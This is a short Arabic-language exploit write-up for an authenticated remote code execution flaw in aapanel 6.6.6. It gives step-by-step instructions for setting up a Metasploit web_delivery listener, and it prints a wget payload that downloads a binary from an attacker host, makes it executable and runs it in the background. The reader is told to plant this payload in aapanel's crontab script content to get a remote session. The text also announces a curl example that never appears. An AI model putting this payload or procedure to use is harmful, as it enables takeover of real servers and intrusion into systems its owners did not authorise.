
aapanel 6.6.6 - (Authenticated) Remote Code Execution
لإعداد هذا الـ PoC، قمت فقط بتثبيت البرنامج باستخدام docker-compose
انتقل إلى متجر البرامج، وانقر على أي صف من حقل الإعدادات، واعترض الطلب عند النقر على "start/stop/restart" وعدّل/حرّر الطلب لتنفيذ ما تريده. إليك مثال باستخدام curl :
لإعداد هذا الـ PoC، قمت بتثبيت Ubuntu 20.04 نظيف، ثم قمت بتثبيت wget + sudo ونفّذت هذا السكربت wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
أولاً، قم بإعداد خيارات web_delivery، سيؤدي هذا إلى إنشاء payload ومستمع.
الآن قم بتشغيله
سيقوم هذا بتوليد الـ payload التالي:
wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown
ثم انسخ/الصق مثل هذا في script content من قائمة crontab في aapanel.
الآن فقط نفّذ crontab الخاص بك وانتظر جلستك.
فقط قم بتشغيل msfconsole -r aapanel.rc وانسخ/الصق الـ payload في قسم script content، واستمتع بجلستك.